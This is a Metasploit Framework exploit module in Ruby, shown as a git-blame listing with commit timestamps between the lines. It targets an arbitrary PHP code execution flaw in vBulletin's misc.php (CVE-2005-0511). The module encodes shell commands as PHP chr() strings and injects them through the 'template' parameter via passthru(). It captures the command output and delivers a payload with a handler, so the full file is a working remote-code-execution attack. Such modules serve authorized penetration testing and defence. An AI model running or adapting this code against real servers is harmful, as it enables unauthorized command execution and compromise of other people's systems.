2007-02-18 00:10:39 +00:00
##
2007-03-01 08:21:36 +00:00
# $Id$
2007-02-18 00:10:39 +00:00
##
##
2010-04-30 08:40:19 +00:00
# This file is part of the Metasploit Framework and may be subject to
2007-02-18 00:10:39 +00:00
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
2009-04-13 14:33:26 +00:00
# http://metasploit.com/framework/
2007-02-18 00:10:39 +00:00
##
2006-01-26 02:07:59 +00:00
require 'msf/core'
2008-10-02 05:23:59 +00:00
class Metasploit3 < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = ExcellentRanking
2006-01-26 02:07:59 +00:00
2008-10-02 05:23:59 +00:00
include Msf :: Exploit :: Remote :: HttpClient
2006-01-26 02:07:59 +00:00
2007-01-05 05:58:13 +00:00
# XXX This module needs an overhaul
2006-01-26 02:07:59 +00:00
def initialize ( info = { } )
2010-04-30 08:40:19 +00:00
super ( update_info ( info ,
2006-01-26 02:07:59 +00:00
'Name' = > 'vBulletin misc.php Template Name Arbitrary Code Execution' ,
'Description' = > %q{
2010-04-30 08:40:19 +00:00
This module exploits an arbitrary PHP code execution flaw in
2006-01-26 02:07:59 +00:00
the vBulletin web forum software . This vulnerability is only
present when the " Add Template Name in HTML Comments " option
is enabled . All versions of vBulletin prior to 3 . 0 . 7 are
affected .
} ,
2006-12-28 23:42:36 +00:00
'Author' = > [ 'str0ke <str0ke[at]milw0rm.com>' , 'cazz' ] ,
2006-05-06 16:34:39 +00:00
'License' = > BSD_LICENSE ,
2006-01-26 02:07:59 +00:00
'Version' = > '$Revision$' ,
'References' = > [
2009-10-12 14:39:51 +00:00
[ 'CVE' , '2005-0511' ] ,
2006-11-28 17:18:43 +00:00
[ 'BID' , '12622' ] ,
2006-01-27 05:00:35 +00:00
[ 'OSVDB' , '14047' ] ,
2006-01-26 02:07:59 +00:00
] ,
'Privileged' = > false ,
2006-01-27 05:00:35 +00:00
'Platform' = > [ 'unix' , 'solaris' ] ,
2006-01-26 02:07:59 +00:00
'Payload' = > {
2006-01-27 05:00:35 +00:00
'Space' = > 512 ,
'DisableNops' = > true ,
'Keys' = > [ 'cmd' , 'cmd_bash' ] ,
2006-01-26 02:07:59 +00:00
} ,
2006-01-27 05:00:35 +00:00
'Targets' = > [ [ 'Automatic' , { } ] , ] ,
'DefaultTarget' = > 0 ,
2006-01-26 02:07:59 +00:00
'DisclosureDate' = > 'Feb 25 2005'
2006-01-27 05:00:35 +00:00
) )
2006-01-26 02:07:59 +00:00
2006-01-27 05:00:35 +00:00
register_options (
[
OptString . new ( 'PATH' , [ true , " Path to misc.php " , '/forum/misc.php' ] ) ,
2010-04-30 08:40:19 +00:00
] , self . class )
2006-01-26 02:07:59 +00:00
deregister_options (
2010-04-30 08:40:19 +00:00
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
2006-12-28 23:42:36 +00:00
)
2006-01-26 02:07:59 +00:00
end
def go ( command )
2007-03-01 08:21:36 +00:00
wrapper = rand_text_alphanumeric ( rand ( 128 ) + 32 )
2006-01-26 02:07:59 +00:00
command = " echo #{ wrapper } ; #{ command } ;echo #{ wrapper } ; "
2006-01-27 05:00:35 +00:00
encoded = command . unpack ( " C* " ) . collect { | x | " chr( #{ x } ) " } . join ( '.' )
2006-01-26 02:07:59 +00:00
2006-12-28 23:42:36 +00:00
res = send_request_cgi ( {
'uri' = > datastore [ 'PATH' ] ,
'method' = > 'GET' ,
'vars_get' = >
{
'do' = > " page " ,
'template' = > " {${passthru( #{ encoded } )}} "
}
} , 5 )
2006-01-26 02:07:59 +00:00
2006-01-27 05:00:35 +00:00
if ( res and res . body )
b = / #{ wrapper } [ \ s \ r \ n]*(.*)[ \ s \ r \ n]* #{ wrapper } /sm . match ( res . body )
if b
return b . captures [ 0 ]
elsif datastore [ 'HTTP::chunked' ] == true
b = / chunked Transfer-Encoding forbidden / . match ( res . body )
if b
raise RuntimeError , 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
2006-01-26 02:07:59 +00:00
2006-01-27 05:00:35 +00:00
return nil
end
2010-04-30 08:40:19 +00:00
2006-01-27 05:00:35 +00:00
def check
response = go ( " echo ownable " )
if ( ! response . nil? and response =~ / ownable /sm )
return Exploit :: CheckCode :: Vulnerable
end
return Exploit :: CheckCode :: Safe
2006-01-26 02:07:59 +00:00
end
2006-01-27 05:00:35 +00:00
def exploit
response = go ( payload . encoded )
if response == nil
print_status ( 'exploit failed' )
2006-01-26 02:07:59 +00:00
else
2006-01-27 05:00:35 +00:00
if response . length == 0
print_status ( 'exploit successful' )
2010-04-30 08:40:19 +00:00
else
2006-01-27 05:00:35 +00:00
print_status ( " Command returned #{ response } " )
end
handler
end
end
2009-10-12 14:39:51 +00:00
end